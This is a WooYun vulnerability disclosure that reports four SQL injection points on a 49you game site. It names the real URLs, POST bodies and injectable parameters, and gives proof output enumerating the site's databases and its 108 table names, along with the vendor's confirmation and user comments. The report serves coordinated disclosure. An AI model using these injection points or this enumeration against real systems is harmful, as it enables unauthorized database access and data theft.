当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132767

漏洞标题:游戏安全之上海49游某站四处SQL注入打包

相关厂商:49you.com

漏洞作者: hh2014

提交时间:2015-08-09 00:17

修复时间:2015-09-26 10:30

公开时间:2015-09-26 10:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-09: 细节已通知厂商并且等待厂商处理中
2015-08-12: 厂商已经确认,细节仅向厂商公开
2015-08-22: 细节向核心白帽子及相关领域专家公开
2015-09-01: 细节向普通白帽子公开
2015-09-11: 细节向实习白帽子公开
2015-09-26: 细节向公众公开

简要描述:

RT

详细说明:

四处,多个参数,前三处为基于时间的盲注
注入点1:

http://dj.49you.com/web/tab/manage.jsp?action=updatesave&id=11&type=2
post参数
Submit=%e6%9b%b4%e6%96%b0&gamename=umNWC3sW
gamename参数存在注入
id参数存在注入
type参数存在注入


注入点2:

http://dj.49you.com/web/tab/QdGameIncome.jsp
post参数
appname=K3LpTenr&beginTime=2015-08-08&endTime=2015-08-08&spname=%e5%8c%97%e4%ba%ac%e5%88%9b%e6%84%8f%e6%af
%94%e7%89%b9%e4%bf%a1%e6%81%af%e6%8a%80%e6%9c%af%e6%9c%89%e9%99%90%e5%85%ac%e5%8f%b8
appname参数存在注入
beginTime参数存在注入


注入点3:

http://dj.49you.com/web/tab/SKGameIncome.jsp
post参数
beginTime=YKhEUkTW&cpName=%e7%88%b1%e8%b5%a2&endTime=2015-08-08&gameNamestr=%e8%b5%a2%e8%af%9d%e8%b4%b9%e8%bf%9e
%e8%bf%9e%e7%9c%8b
beginTime参数存在注入
cpName参数存在注入
endTime参数存在注入
gameNamesr参数存在注入


注入点4:

http://dj.49you.com/web/ltsjyx_income.jsp
post参数:
beginTime=-1&endTime=1
beginTime参数存在注入
endTime参数存在注入

漏洞证明:

web application technology: Nginx
back-end DBMS: Microsoft SQL Server 2012
current user: 'sp'
current database: 'SP'
current user is DBA: False
available databases [17]:
[*] Administration
[*] blacklist
[*] Company
[*] DataBack
[*] master
[*] model
[*] msdb
[*] new_system
[*] NZIformation
[*] ReportServer
[*] ReportServerTempDB
[*] shouYou
[*] SP
[*] SP2
[*] tempdb
[*] Test
[*] wap_game
web application technology: Nginx, JSP
back-end DBMS: Microsoft SQL Server 2012
Database: SP
[108 tables]
+---------------------+
| CityList |
| Ctstats |
| DHXGame_User |
| DXBaoYueZDYJH |
| OnlineProvince |
| PcInterface |
| ProvinceCity |
| ProvinceList |
| amountTable |
| baoyue |
| baoyue2 |
| black_imsi |
| by_send |
| cp_channel |
| cpbaccount |
| cppay |
| cppay_date |
| cppay_pro |
| dx_imsinum_mrtj |
| dx_phonenum_motj |
| dx_phonenum_mrtj |
| dxbaoyuesendrecord |
| dxopencity |
| dxspid |
| fee_request |
| fee_request1 |
| fp |
| fptaxrate |
| game |
| gameIncome |
| gametype |
| gamezhou |
| hourinfo |
| imei |
| importtxt |
| imsi |
| imsi0716 |
| interfaceAgency |
| kftsManage |
| ltgamerecv |
| ltsjyx |
| ltwogame |
| mmLoginInfor |
| mmOrder |
| mmShow |
| mm_list |
| mm_rule |
| mmcompany |
| mmctrl |
| mmqrecv |
| mmrecv |
| monthinformation |
| mosync |
| mrsync |
| newCityList |
| nz_cp |
| pb_cp |
| pcgame |
| pcgameid |
| pcweb |
| pinbi_cp |
| price |
| pro_tj |
| recv_mo |
| recvrecord |
| rules |
| send_mr |
| sendrecord |
| servicetype |
| settlement |
| settlement_back |
| settlement_pro |
| sjqbrecv |
| smsrecv |
| sq_phonenum_tj |
| tb_Day_Stat |
| tb_LINE |
| tb_LyDay_Stat |
| tb_LyDay_Stat0707 |
| tb_LyDay_Stat_0702 |
| tb_SP |
| tb_byDDmo |
| tb_byDDmr |
| tb_informMM |
| tb_monthcalculate |
| tb_spinformation |
| tb_sppay |
| tb_wyurlmanage |
| telimsi |
| telrecv |
| telrecvs |
| temp_send |
| temp_send1 |
| temp_send2 |
| testsendrecord |
| text |
| textlink |
| tj |
| tjOrd2 |
| tjbakbak |
| update_rules_record |
| vbtj |
| vw_rules |
| wjwar |
| wx_Login_Type |
| wx_User |
| xiaoguobiao |
| zxf_cp |
+---------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 hh2014@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-12 10:28

厂商回复:

我们已经确定问题了。谢谢路人甲同学

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-19 20:10 | 猫和老鼠 ( 路人 | Rank:4 漏洞数:3 | ...)

    这个厂商不就是那个说悬赏3W元的骗子吗。骗术不错

  2. 2015-08-19 21:20 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @猫和老鼠 礼物都不肯送- - 你说这种人是怎么被单位录用的呢?